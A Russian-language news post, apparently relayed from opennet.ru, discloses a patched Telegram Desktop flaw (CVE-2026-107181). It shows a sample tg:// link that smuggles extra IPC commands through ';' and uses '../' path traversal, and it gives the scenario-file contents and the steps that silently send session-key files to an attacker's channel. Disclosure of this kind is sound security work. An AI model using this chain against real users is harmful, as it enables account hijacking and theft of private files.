TGViewer
opennet.ru полные новости opennet.ru полные новости @opennet_full · 231 subscribers
Post #6927 112
Уязвимость в Telegram Desktop, позволяющая отправить произвольные файлы при клике на ссылку

Раскрыты подробности и метод эксплуатации уязвимости (CVE-2026-107181) в Telegram Desktop, официальном клиенте Telegram для настольных систем. Проблема вызвана отсутствием должной обработки неэкранированных символов-разделителей в командах IPC, что позволяло при клике на отправленную ссылку организовать передачу атакующему любых файлов с системы жертвы, включая файлы с сессионными ключами, которые можно использовать для захвата учётной записи в Telegram. Уязвимость устранена в выпуске Telegram Desktop 7.2.9.


При клике на ссылках "tg://" операционная система запускает связанное с данным типом ссылок приложение Telegram Desktop. Если в системе уже запущен другой экземпляр данного приложения, то запущенный процесс передаёт ему ссылку через сокет при помощи IPC-интерфейса. Проблема в том, что если указать символ ";" среди параметров ссылки (например, "tg://x?a=1;OPEN..."), содержимое разделяется и идущие после символа ";" части обрабатываются как отдельные команды.


Для совершения атаки задействована команда OPEN вместе с URI-схемой "interpret:", предназначенной для запуска служебных сценариев через IPC, которые использовались для автоматической отправки новых релизов в каналы. Сценарий предоставляет собой предопределённый локальный файл, в котором указан отправляемый в канал файл и идентификатор канала. Файловый путь к сценариям обрабатывается относительно служебного подкаталога, но из-за отсутствия чистки "../" в файловых путях атакующий имеет возможность обратиться к файлам, сохранённым за пределами базового каталога. Например, можно загрузить файл в свою telegram-группу, после чего сослаться на это файл как на сценарий, подготовив ссылку типа:
   tg://x?a=1;OPEN:interpret:../../../Downloads/Telegram%20Desktop/instructions.txt




Этапы проведения атаки:



- Атакующий добавляет жертву в свою группу (при настройках по умолчанию добавление не требует подтверждения от добавляемого) и отправляет в эту группу текстовый файл, в котором указан канал и путь к сценарию. Telegram сохранит этот файл в предопределённый системный подкаталог при заходе жертвы в группу.
   channel: 2005234537
file: tdata/D877F783D5D3EF8Cs

- Атакующий присылает жертве невинно выглядящую ссылку на свой хост (например, "https://coolsite.org"), которая при открытии через перенаправление на сервере атакующего заменяется на URI вида 'tg://x?a=1;OPEN:interpret:...;OPEN:interpret:...".

- При клике по ссылке браузер вызывает обработчик URI "tg://" запускающий вышеотмеченную цепочку запуска команд и отправляет файлы к канал атакующего без вывода каких-либо уведомлений и без запроса подтверждения отправки.

- Получив файлы из подкаталога tdata c ключами шифрования и авторизации, при отсутствии выставленного пользователем локального пароля атакующий может клонировать сеанс подключения жертвы на своём устройстве.







https://opennet.ru/66431/
https://opennet.me/66431/
More from @opennet_full
  1. Oct 9, 2026Cloudflare поглотила JavaScript-платформу Deno и прекратит её разработку Компания Cloudfla…
  2. Oct 9, 2026Вредоносное ПО в прошивках китайских Android-смартфонов на чипах MediaTek Компания Bitdefe…
  3. Oct 9, 2026В ФС Ext4 намечен к удалению режим data=journal В состав ядра Linux 7.3, релиз которого ож…
  4. Oct 9, 2026Оценка затрат времени на поддержание пакетов с открытым ПО в Google Компания Google опубли…
  5. Oct 8, 2026Выпуск среды рабочего стола COSMIC 1.10.0 Компания System76, разрабатывающая Linux-дистриб…
  6. Oct 8, 2026Часть сервисов Ubuntu и Canonical недоступна из-за DDoS-атаки Компания Canonical предупред…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →